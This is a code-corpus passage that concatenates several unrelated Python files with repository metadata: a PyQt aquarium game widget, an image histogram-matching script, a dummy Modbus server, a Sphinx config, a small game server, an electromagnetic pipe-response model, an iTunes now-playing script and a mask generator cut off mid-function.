sys.path.append(os.path.join(parent_directory, "core"))
from game import Game
from unit import Directions
class Aquarium(QWidget):
score_changed = QtCore.pyqtSignal()
def __init__(self, parent):
super(Aquarium, self).__init__()
self.game = Game((self.size().width(), self.size().height()))
self.score = self.game.score
self.score_changed.emit()
self.paused = False
self.load_pictures()
self.timer = QtCore.QTimer(self)
self.timer.timeout.connect(self.action)
self.timer.start(40)
def resizeEvent(self, event):
self.game.constrain((event.size().width(), event.size().height()))
def paintEvent(self, event):
canvas = QtGui.QPainter()
canvas.begin(self)
canvas.setPen(QtCore.Qt.NoPen)
canvas.drawPixmap(0, 0, self.background.scaled(self.size().width(),
self.size().height()))
for alien in self.game.aliens:
self.draw_alien(canvas, alien)
for fish in self.game.fishes:
self.draw_fish(canvas, fish)
for coin in self.game.coins:
self.draw_coin(canvas, coin)
for food in self.game.food:
self.draw_food(canvas, food)
@QtCore.pyqtSlot()
def spawn_fish(self):
self.game.spawn_fish()
@QtCore.pyqtSlot()
def upgrade_weapon(self):
self.game.upgrade_weapon()
@QtCore.pyqtSlot()
def upgrade_food(self):
self.game.upgrade_food()
@QtCore.pyqtSlot()
def pause(self):
self.paused = True
@QtCore.pyqtSlot()
def unpause(self):
self.paused = False
def mousePressEvent(self, event):
if event.button() == QtCore.Qt.LeftButton:
self.game.mouse_press(event.x(), event.y())
def load_pictures(self):
# Alien
self.alien_images = {
'lion': QtGui.QPixmap(
os.path.join(resource_directory, "alien.png")),
'blue': QtGui.QPixmap(
os.path.join(resource_directory, "alien2.png"))}
self.alien_images_mirrored = {}.fromkeys(self.alien_images)
self.fill_mirrored(self.alien_images, self.alien_images_mirrored)
# Fish
self.fish_images = {
'swim': QtGui.QPixmap(
os.path.join(resource_directory, "fish_swim.png")),
'eat': QtGui.QPixmap(
os.path.join(resource_directory, "fish_eat.png")),
'turn': QtGui.QPixmap(
os.path.join(resource_directory, "fish_turn.png")),
'hungry_die': QtGui.QPixmap(
os.path.join(resource_directory, "fish_die.png")),
'hungry_swim': QtGui.QPixmap(
os.path.join(resource_directory, "hungry_swim.png")),
'hungry_eat': QtGui.QPixmap(
os.path.join(resource_directory, "hungry_eat.png")),
'hungry_turn': QtGui.QPixmap(
os.path.join(resource_directory, "hungry_turn.png"))}
self.fish_images_mirrored = {}.fromkeys(self.fish_images)
self.fill_mirrored(self.fish_images, self.fish_images_mirrored)
# Food
self.food_image = QtGui.QPixmap(
os.path.join(resource_directory, "food.png"))
# Coin
self.coin_image = QtGui.QPixmap(
os.path.join(resource_directory, "coin.png"))
# Background
self.background = QtGui.QPixmap(
os.path.join(resource_directory, "background.png"))
def fill_mirrored(self, normal_images, mirrored):
for key, value in normal_images.items():
mirror = value.toImage()
mirror = mirror.mirrored(True, False)
mirrored[key] = QtGui.QPixmap().fromImage(mirror)
def action(self):
""" Incorporates all objects' actions and calls the repaint event."""
if not self.paused:
self.game.actions()
if self.score != self.game.score:
self.score = self.game.score
self.score_changed.emit()
self.repaint()
def draw_alien(self, canvas, alien):
if alien.mirrored:
image = self.alien_images_mirrored[alien.kind]
else:
image = self.alien_images[alien.kind]
if alien.state == 'swim':
state = 0
else:
state = 160
canvas.drawPixmap(alien.x, alien.y, image,
alien.frame, state, 160, 160)
def draw_fish(self, canvas, fish):
state = fish.state
if fish.hungry:
state = 'hungry_' + state
if fish.mirrored:
image = self.fish_images_mirrored[state]
else:
image = self.fish_images[state]
canvas.drawPixmap(fish.x, fish.y, image,
fish.frame, fish.size * 80, 80, 80)
def draw_coin(self, canvas, coin):
canvas.drawPixmap(coin.x, coin.y, self.coin_image,
coin.frame, coin.worth * 72, 72, 72)
def draw_food(self, canvas, food):
canvas.drawPixmap(food.x, food.y, self.food_image,
food.frame, 0, 40, 40)
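# Added usage sketch (not part of the original file): runs the widget
# standalone. Assumes the images referenced in load_pictures() exist under
# gui/resources and that the core Game/unit modules are importable.
if __name__ == '__main__':
    app = QApplication(sys.argv)
    aquarium = Aquarium(None)
    aquarium.setWindowTitle('Insaniquarium')
    aquarium.resize(800, 600)
    aquarium.show()
    sys.exit(app.exec_())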
|
gpl-2.0
| -6,743,611,437,689,086,000
| 33.515723
| 78
| 0.579993
| false
| 3.577575
| false
| false
| false
|
OSGeoLabBp/tutorials
|
english/img_processing/code/image_equalize.py
|
1
|
1689
|
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
Equalize images to the histogram of a reference image
Based on https://www.pyimagesearch.com/2021/02/08/histogram-matching-with-opencv-scikit-image-and-python/
"""
import argparse
import os
import sys
from skimage import exposure
import cv2
# command line parameters
parser = argparse.ArgumentParser()
parser.add_argument('names', metavar='file_names', type=str, nargs='*',
help='pathes to image files to process')
parser.add_argument("-r", "--reference", required=True,
help="path to the input reference image")
parser.add_argument('--nowrite', action="store_true",
help='do not write equalized images to disk')
parser.add_argument('--debug', action="store_true",
help='show images on screen')
args = parser.parse_args()
if not args.names:
print("No input images given")
parser.print_help()
sys.exit(0)
# load the reference images
if args.debug:
print("Loading reference image...")
ref = cv2.imread(args.reference)
# determine if we are performing multichannel histogram matching
multi = ref.shape[-1] > 1
for fn in args.names:
if args.debug:
print("Performing histogram matching for {}...".format(fn))
src = cv2.imread(fn)
matched = exposure.match_histograms(src, ref, multichannel=multi)
if not args.nowrite:
spl = os.path.splitext(fn)
mn = spl[0] + "_matched" + spl[1]
if args.debug:
print("Writing matched image...")
cv2.imwrite(mn, matched)
if args.debug:
# show the output images
cv2.imshow("Source", src)
cv2.imshow("Reference", ref)
cv2.imshow("Matched", matched)
cv2.waitKey(0)
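# Hedged usage sketch (added; file names are assumptions):
#   python3 image_equalize.py -r reference.jpg photo1.jpg photo2.jpg
# writes photo1_matched.jpg and photo2_matched.jpg next to the inputs;
# add --debug to preview the source/reference/matched windows.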
|
cc0-1.0
| -2,569,869,299,229,796,400
| 32.78
| 109
| 0.671995
| false
| 3.540881
| false
| false
| false
|
miaoski/bsideslv-plc-home
|
dummy.py
|
1
|
1293
|
# -*- coding: utf8 -*-
# Run ipython -i dummy.py if you don't want to run it on Raspberry Pi
from pymodbus.server.async import StartTcpServer
from pymodbus.datastore import ModbusSequentialDataBlock
from pymodbus.datastore import ModbusSlaveContext, ModbusServerContext
from identity import identity
import logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')
log = logging.getLogger()
def dump_store(a):
context = a[0]
address = 0x00
print "DI values:", context[0].store['d'].values[:20]
print "CO values:", context[0].store['c'].values[:20]
print "HR values:", context[0].store['h'].values[:10]
print "IR values:", context[0].store['i'].values[:10]
# Initialize ModBus Context
store = ModbusSlaveContext(
di = ModbusSequentialDataBlock(0, [0,0,0,1,1,1,1,1,1,0,1,0,1,1,1,0,0,1,1,1,1,1]),
co = ModbusSequentialDataBlock(0, [0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0]),
hr = ModbusSequentialDataBlock(0, [0,0,37,0,35,0,0] + [0] * 10),
ir = ModbusSequentialDataBlock(0, [0,0,85,0,0,0,0] + [0] * 10))
context = ModbusServerContext(slaves=store, single=True)
# Start loop
def run(ip='192.168.42.1', port=502):
StartTcpServer(context, identity=identity(), address=(ip, port))
print 'Type run() to StartTcpServer'
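# Hedged usage sketch (added; IP and port are the defaults above):
#   $ ipython -i dummy.py
#   >>> dump_store((context,))   # print the first DI/CO/HR/IR registers
#   >>> run()                    # start the Modbus TCP server (blocks)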
|
gpl-2.0
| 5,917,105,770,169,918,000
| 35.942857
| 85
| 0.688322
| false
| 2.751064
| false
| false
| false
|
IQSS/geoconnect
|
scripts/unmapped_row_test.py
|
1
|
1633
|
# ------------------------------
# Quick script to test unmatched-row reporting for a
# WorldMap tabular join layer
#
# Prints the failed rows both as a list and as CSV
# ------------------------------
import os, sys
from os.path import abspath, isdir, realpath, isfile
proj_paths = [abspath('../'), abspath('../geoconnect')]
sys.path += proj_paths
# ------------------------------
# This is so Django knows where to find stuff.
# ------------------------------
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "geoconnect.settings.local")
from gc_apps.geo_utils.msg_util import *
from gc_apps.gis_tabular.models import WorldMapJoinLayerInfo
from gc_apps.gis_tabular.unmapped_row_util import UnmatchedRowHelper
def check_unmatched(layer_info_md5):
msgt('check_unmatched')
wm_info = WorldMapJoinLayerInfo.objects.get(md5=layer_info_md5)
kwargs = dict(show_all_failed_rows=True)
unmatched_row_helper = UnmatchedRowHelper(wm_info, **kwargs)
if unmatched_row_helper.has_error:
msg('ERROR: %s' % unmatched_row_helper.error_message)
return
msgt('bad rows as list')
row_list = unmatched_row_helper.get_failed_rows_as_list()
if unmatched_row_helper.has_error:
msg('ERROR: %s' % unmatched_row_helper.error_message)
return
msg(row_list)
row_list_csv = unmatched_row_helper.get_failed_rows_as_csv()
if unmatched_row_helper.has_error:
msg('ERROR: %s' % unmatched_row_helper.error_message)
return
msg(row_list_csv)
if __name__ == '__main__':
tab_md5 = '1a77cebad8a249820f2c577392dae20a'
check_unmatched(tab_md5)
|
apache-2.0
| 2,044,353,086,420,126,000
| 29.811321
| 76
| 0.650949
| false
| 3.319106
| false
| false
| false
|
joferkington/mplstereonet
|
docs/conf.py
|
1
|
9530
|
# -*- coding: utf-8 -*-
#
# mplstereonet documentation build configuration file, created by
# sphinx-quickstart on Sun Jun 23 13:39:02 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
import runpy
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Generate pages for examples
path = os.path.join(os.path.dirname(__file__), 'generate_example_rst.py')
runpy.run_path(path, run_name='__main__')
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode',
'sphinx.ext.autosummary', 'numpydoc']
numpydoc_show_class_members = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'mplstereonet'
copyright = u'2013, Free Software Foundation'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.6'
# The full version, including alpha/beta/rc tags.
release = '0.6-dev'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', 'setup.py']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'mplstereonetdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'mplstereonet.tex', u'mplstereonet Documentation',
u'Joe Kington', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'mplstereonet', u'mplstereonet Documentation',
[u'Joe Kington'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'mplstereonet', u'mplstereonet Documentation',
u'Joe Kington', 'mplstereonet', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# -- Options for Epub output ---------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = u'mplstereonet'
epub_author = u'Joe Kington'
epub_publisher = u'Joe Kington'
epub_copyright = u'2013, Joe Kington'
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
#epub_exclude_files = []
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Show __init__ docs
def skip(app, what, name, obj, skip, options):
if name == '__init__':
return False
return skip
def setup(app):
app.connect('autodoc-skip-member', skip)
|
mit
| 6,082,613,948,636,367,000
| 30.452145
| 80
| 0.701889
| false
| 3.690937
| true
| false
| false
|
JonasT/miraclecrafter
|
src/miraclecrafterserver/onlinegame.py
|
1
|
5858
|
"""
This file is part of the Miracle Crafter Server.
Miracle Crafter Server (C) 2014 The Miracle Crafter Team (see AUTHORS)
Miracle Crafter Server is free software: you can redistribute it and/or
modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your
option) any later version.
Miracle Crafter Server is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Miracle Crafter Server.
If not, see <http://www.gnu.org/licenses/>.
In addition, the Miracle Crafter Server developers grant this exception:
Game code and content created with the Miracle Crafter Client as part
of your game shall be excepted from the GPL licensing of Miracle Crafter
Server. However, this exception doesn't cover any modifications to any of
the GPL-licensed files shipping with Miracle Crafter Server, or adding
new files to any of the folders containing GPL-licensed files of Miracle
Crafter Server, or game code attempting to modify Miracle Crafter Server's
behavior at runtime beyond using the regular game code interfaces for Lua
code which your game is supposed to use.
"""
import logging
from miraclecrafterserver.server import SimpleServer
from miraclecrafterserver.game import Game
from miraclecrafterserver.protocolmodule import get_module_instances, \
OnlineGameBaseModule
from miraclecrafterserver.accounts import login
class OnlineGame(Game):
def __init__(self, game_path, port, version_str):
super(OnlineGame, self).__init__(game_path)
self.connections = []
self.port = port
self.version_str = version_str
self.required_client_version = 1
module_instances = get_module_instances()
logging.info("Starting game with " + str(len(module_instances))\
+ " module instances available")
for module in module_instances.values():
if isinstance(module, OnlineGameBaseModule):
module.set_online_game_instance(self)
else:
module.set_game_instance(self)
def split_args(self, args_line):
if len(args_line) == 0:
return []
splitted_list = args_line.split(":", 1)
last_arg = ""
if len(splitted_list) == 2:
last_arg = splitted_list[1].strip()
        splittable_args = splitted_list[0].strip()
        while splittable_args.find("  ") >= 0:
            splittable_args = splittable_args.replace("  ", " ")
args = splittable_args.split(" ")
if len(args[0]) == 0:
del args[0]
if len(last_arg) > 0:
args.append(last_arg)
return args
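    # Illustrative examples (added; not in the original file):
    #   split_args("abc def :free text") -> ["abc", "def", "free text"]
    #   split_args(":payload only")      -> ["payload only"]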
def connection_has_data(self, connection, data):
data = data.strip()
if len(data) == 0:
return
module = data.split(" ", 1)[0]
data = data[len(module)+1:]
cmd = data.split(" ", 1)[0]
args = self.split_args(data[len(cmd)+1:])
if len(cmd) == 0:
connection.send("core error-empty-cmd")
return
if not module == "core":
module_instances = get_module_instances()
# forward to appropriate module:
if module in module_instances:
if not connection.connected_as_client:
if not isinstance(module_instances[module], \
OnlineGameBaseModule):
connection.send("core error-module-unavailable " +\
module)
return
self.process_cmd(connection, module, cmd, args)
return
self.process_cmd(connection.client, module, cmd, args)
return
# module not found:
connection.send("core error-invalid-module :" + module)
return
else:
if cmd == "quit":
connection.send("core confirm-quit :Bye!")
connection.close()
self.connections.remove(connection)
elif cmd == "ping":
if len(args) == 0:
connection.send("core error-missing-arguments core ping")
return
if len(args[0]) > 64:
connection.send("core error-invalid-argument core " +\
"ping 1 :excessive length")
return
connection.send("core pong :" + args[0])
else:
connection.send("core error-unknown-cmd core :" + cmd)
def server_reports_new_connection(self, connection):
connection.connected_as_client = False
connection.set_read_callback(lambda data:
self.connection_has_data(connection, data))
self.connections.append(connection)
connection.send("core hello-msg :Hello client! This is Miracle "\
"Crafter Server Version " + self.version_str)
connection.send("core version-info " + self.version_str + " :" + \
"unmodified")
connection.send("core available-server-protocol-extensions :" + \
"core")
connection.send("core required-client-protocol-extensions :" + \
"core")
connection.send("core required-client-version " +\
str(self.required_client_version))
def run(self):
self.server = SimpleServer(self.port, \
self.server_reports_new_connection)
frame_time = 1/10
while 1:
self.server.tick(frame_time)
|
gpl-3.0
| 9,010,634,835,741,574,000
| 38.581081
| 79
| 0.602253
| false
| 4.32644
| false
| false
| false
|
geoscixyz/em_examples
|
em_examples/FDEMpipe.py
|
1
|
6739
|
import numpy as np
import matplotlib.pyplot as plt
import scipy.io
import warnings
warnings.filterwarnings('ignore')
from ipywidgets import interactive, IntSlider, widget, FloatText, FloatSlider, Checkbox
def fempipeWidget(alpha, pipedepth):
respEW, respNS, X, Y = fempipe(alpha, pipedepth)
fig = plt.figure(figsize = (12, 9))
ax0 = plt.subplot2grid((2,2), (0,0))
ax1 = plt.subplot2grid((2,2), (0,1))
ax2 = plt.subplot2grid((2,2), (1,0), colspan=2)
dat0 = ax0.imshow(respEW.real*100, extent=[X.min(),X.max(),Y.min(),Y.max()])
dat1 = ax1.imshow(respNS.real*100, extent=[X.min(),X.max(),Y.min(),Y.max()])
cb0 = plt.colorbar(dat0, ax = ax0)
cb1 = plt.colorbar(dat1, ax = ax1)
ax0.set_title("In-phase EW boom (%)", fontsize = 12)
ax1.set_title("In-phase NS boom (%)", fontsize = 12)
ax0.set_xlabel("Easting (m)", fontsize = 12)
ax1.set_xlabel("Easting (m)", fontsize = 12)
ax0.set_ylabel("Northing (m)", fontsize = 12)
ax1.set_ylabel("Northing (m)", fontsize = 12)
ax0.plot(np.r_[0., 0.], np.r_[-10., 10.], 'k--', lw=2)
ax1.plot(np.r_[0., 0.], np.r_[-10., 10.], 'k--', lw=2)
ax2.plot(Y[:,20],respEW[:, 20].real, 'k.-')
ax2.plot(Y[:,20],respEW[:, 20].imag, 'k--')
ax2.plot(Y[:,20],respNS[:, 20].real, 'r.-')
ax2.plot(Y[:,20],respNS[:, 20].imag, 'r--')
ax2.legend(('In-phase EW boom', 'Out-of-phase EW boom', 'In-phase NS boom', 'Out-of-phase NS boom'),loc=4)
ax2.grid(True)
ax2.set_ylabel('Hs/Hp (%)', fontsize = 16)
ax2.set_xlabel('Northing (m)', fontsize = 16)
ax2.set_title('Northing profile line at Easting 0 m', fontsize = 16)
plt.tight_layout()
plt.show()
def fempipe(a, pipedepth):
"""
EOSC350 forward modeling of EM-31 responses with pipeline model
Only two adjustable parameters: alpha and depth of pipe below surface
Pipeline oriented W-E (many small loops lined up)
    forward model EW and NS boom configurations
Plot in-phase maps of EW and NS boom
Plot NS profile
"""
freq = 9800
L = 0.1
s = 3.6
R = 2*np.pi*freq*L/a
fa = (1j*a)/(1+1j*a)
tau = L/R
boomheight = 1.
Npipe = 20
xmax = 10.
npts = 100
pipeloc = np.c_[ np.linspace(-10,10,Npipe), np.zeros(Npipe), np.zeros(Npipe)-pipedepth]
pipeloc = np.vstack((pipeloc, pipeloc))
pipeangle1 = np.c_[np.zeros(Npipe)+90, np.zeros(Npipe)+0]
    pipeangle2 = np.c_[np.zeros(Npipe)+90, np.zeros(Npipe)+90]  # defined but never used below
pipeangle3 = np.c_[np.zeros(Npipe)+0, np.zeros(Npipe)+0]
pipeangle = np.vstack((pipeangle1, pipeangle3))
x = np.linspace(-xmax, xmax, num=npts)
y = x.copy()
X, Y = np.meshgrid(x, y)
XY = np.c_[X.flatten(), Y.flatten()]
loop1loc_NS = np.c_[XY[:,0], XY[:,1]-s/2, boomheight*np.ones(XY.shape[0])]
loop3loc_NS = np.c_[XY[:,0], XY[:,1]+s/2, boomheight*np.ones(XY.shape[0])]
loop1angle = np.c_[np.ones(XY.shape[0])*0., np.ones(XY.shape[0])*0.]
loop3angle = np.c_[np.ones(XY.shape[0])*0., np.ones(XY.shape[0])*0.]
loop1loc_EW = np.c_[XY[:,0]-s/2, XY[:,1], boomheight*np.ones(XY.shape[0])]
loop3loc_EW = np.c_[XY[:,0]+s/2, XY[:,1], boomheight*np.ones(XY.shape[0])]
respEW = 0j
respNS = 0j
for q in range(pipeloc.shape[0]):
loop2loc = np.c_[np.ones(XY.shape[0])*pipeloc[q,0], np.ones(XY.shape[0])*pipeloc[q,1], np.ones(XY.shape[0])*pipeloc[q,2]]
loop2angle = np.c_[np.ones(XY.shape[0])*pipeangle[q,0], np.ones(XY.shape[0])*pipeangle[q,1]]
respEW += HsHp(loop1loc_EW,loop1angle,loop2loc,loop2angle,loop3loc_EW,loop3angle,freq,L,R)
respNS += HsHp(loop1loc_NS,loop1angle,loop2loc,loop2angle,loop3loc_NS,loop3angle,freq,L,R)
return respEW.reshape((npts, npts)), respNS.reshape((npts, npts)), X, Y
def Lij(loopiloc,loopiangle,loopjloc,loopjangle):
"""
    Calculate mutual inductance of two loops (simplified to magnetic dipole)
SEG EM Volume II (Page 14): ... Lij as the amount of magnetic flux that
cuts circuit i due to a unit current in loop j.
Since we use magnetic dipole model here, the magnetic flux will be the
magnetic intensity B obtained by Biot-Savart Law.
Angles in degree
Inductance in T*m^2/A; Here the current and loop area are both unit.
"""
xi = loopiloc[:,0]
yi = loopiloc[:,1]
zi = loopiloc[:,2]
xj = loopjloc[:,0]
yj = loopjloc[:,1]
zj = loopjloc[:,2]
thetai = loopiangle[:,0]
alphai = loopiangle[:,1]
thetaj = loopjangle[:,0]
alphaj = loopjangle[:,1]
thetai = thetai/180 * np.pi # degtorad(thetai);
alphai = alphai/180 * np.pi # degtorad(alphai);
thetaj = thetaj/180 * np.pi # degtorad(thetaj);
alphaj = alphaj/180 * np.pi # degtorad(alphaj);
# http://en.wikipedia.org/wiki/Magnetic_moment#Magnetic_flux_density_due_to_an_arbitrary_oriented_dipole_moment_at_the_origin
# assume the dipole at origin, the observation is now at
x = xi - xj
y = yi - yj
z = zi - zj
# orthogonal decomposition of dipole moment
p = np.cos(thetaj); # vertical
n = np.sin(thetaj) * np.cos(alphaj) # y
m = np.sin(thetaj) * np.sin(alphaj) # x
Hx = ( 3.*(m*x+n*y+p*z)*x/((x**2+y**2+z**2)**(5./2)) - m/((x**2+y**2+z**2)**(3./2)) )/4./np.pi
Hy = ( 3.*(m*x+n*y+p*z)*y/((x**2+y**2+z**2)**(5./2)) - n/((x**2+y**2+z**2)**(3./2)) )/4./np.pi
Hz = ( 3.*(m*x+n*y+p*z)*z/((x**2+y**2+z**2)**(5./2)) - p/((x**2+y**2+z**2)**(3./2)) )/4./np.pi
H = np.c_[Hx, Hy, Hz]
# project B field to normal direction of loop i
L = H*np.c_[ np.sin(thetai)*np.sin(alphai), np.sin(thetai)*np.cos(alphai), np.cos(thetai)]
return L.sum(axis=1)
def HsHp(loop1loc,loop1angle,loop2loc,loop2angle,loop3loc,loop3angle, freq,L,R):
"""
EM response of 3-loop model
response = Hs/Hp = - (L12*L23/L22/L13) * (i*a/(1+i*a))
"""
a = 2. * np.pi * freq * L / R
L12 = L * Lij(loop1loc,loop1angle,loop2loc,loop2angle)
L23 = L * Lij(loop2loc,loop2angle,loop3loc,loop3angle)
L13 = Lij(loop1loc,loop1angle,loop3loc,loop3angle)
response = - (L12*L23/L13/L) * ( (1j*a)/(1+1j*a) )
return response
def interact_femPipe():
Q = interactive(fempipeWidget,
alpha = FloatSlider(min=0.1,max=5.,step=0.1,value=1., continuous_update=False),
pipedepth = FloatSlider(min=0.5,max=4.0,step=0.1,value=1.0, continuous_update=False))
return Q
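# Hedged usage sketch (added; assumes a Jupyter notebook with ipywidgets
# enabled, where displaying the returned object renders the two sliders):
#   from em_examples.FDEMpipe import interact_femPipe
#   Q = interact_femPipe()
#   Q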
if __name__ == '__main__':
a = 1.
pipedepth = 1.
respEW, respNS, X, Y = fempipe(a, pipedepth)
# print resp.shape
import matplotlib.pyplot as plt
fig, ax = plt.subplots(1,2, figsize = (12, 5))
    # pcolor() takes no level count; contourf(..., 40) matches the intended 40 levels
    ax[0].contourf(X, Y, respEW.real, 40)
    ax[1].contourf(X, Y, respNS.real, 40)
plt.show()
|
mit
| -2,975,767,107,371,324,000
| 36.859551
| 129
| 0.601425
| false
| 2.54494
| false
| false
| false
|
myles/mylesbraithwaite.org
|
source/_uploads/2016/05/20/itunes-playing/playing.py
|
1
|
1806
|
#!/usr/bin/env python3
import subprocess
def osascript(script):
"""
    This is a bridge between Python and AppleScript using the `osascript`
    command line app.
"""
process = subprocess.run(['osascript', '-e', script],
stdout=subprocess.PIPE)
    # Because `subprocess.CompletedProcess.stdout` holds bytes (followed by a
    # trailing newline), I have to clean it a little.
return process.stdout.decode('utf-8').strip()
def itunes(args):
"""This is so I don't have to repeat a bunch of code."""
script = 'tell application "iTunes" to {0} as string'
return osascript(script.format(args))
def is_running():
"""
Here we a checking to see if iTunes is currently running.
I'm doing this because if iTunes is closed I don't want to open it.
"""
output = osascript('application "iTunes" is running')
if output == 'true':
return True
else:
return False
def is_playing():
"""This function is to check if iTunes is currently playing music."""
output = itunes('player state')
if output == 'playing':
return True
else:
return False
def get_track():
"""This is the main function that get the currently playing track."""
track = {}
track['name'] = itunes('name of current track')
track['artist'] = itunes('artist of current track')
track['album'] = itunes('album of current track')
return track
def main():
if not is_running():
return None
    # `is_running()` and `is_playing()` need to be run separately; calling
    # `is_playing()` without the `is_running()` guard would launch iTunes.
if is_playing():
print('iTunes is currently playing:')
print("{name} / {artist} / {album}".format(**get_track()))
if __name__ == "__main__":
main()
|
cc0-1.0
| -5,790,147,332,706,279,000
| 23.405405
| 78
| 0.616279
| false
| 3.892241
| false
| false
| false
|
jeffmacinnes/pyneal
|
utils/mkDummyMask.py
|
1
|
2226
|
"""
Tool to quickly make a dummy mask with user-supplied dimensions
The resulting mask will be a rectangle (.25*xDim X .25*yDim) positioned in the
middle of the middle slice of the given volume dimensions
"""
import os
from os.path import join
import sys
import argparse
import nibabel as nib
import numpy as np
def mkDummyMask(dims, outputDir):
""" Make a dummy mask of given dims
Parameters
----------
dims : int list (length = 3)
[x, y, z] dimensions of the output mask
outputDir : string
full path to where the output mask will be saved
"""
assert len(dims) == 3, 'Too many dimensions specified!'
# volume dims
x,y,z = dims
print('mask dimensions: [{}, {}, {}]'.format(x,y,z))
# confirm output path is a real path
